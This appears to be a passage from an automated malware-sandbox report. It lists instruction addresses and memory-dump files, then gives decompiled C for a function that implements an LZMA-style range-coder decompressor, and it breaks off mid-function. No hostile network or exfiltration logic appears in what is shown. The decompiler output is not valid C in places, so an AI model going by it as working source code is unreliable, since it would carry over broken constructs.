                                                0x004064cb
                                                0x004064ce
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068bc
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00406582
                                                0x00406582
                                                0x00000000
                                                0x00406582
                                                0x00406803
                                                0x00406a38
                                                0x00406a5a
                                                0x00406a60
                                                0x00406a62
                                                0x00406a69
                                                0x00000000
                                                0x00000000
                                                0x00406067
                                                0x00406a6f
                                                0x00406a6f
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
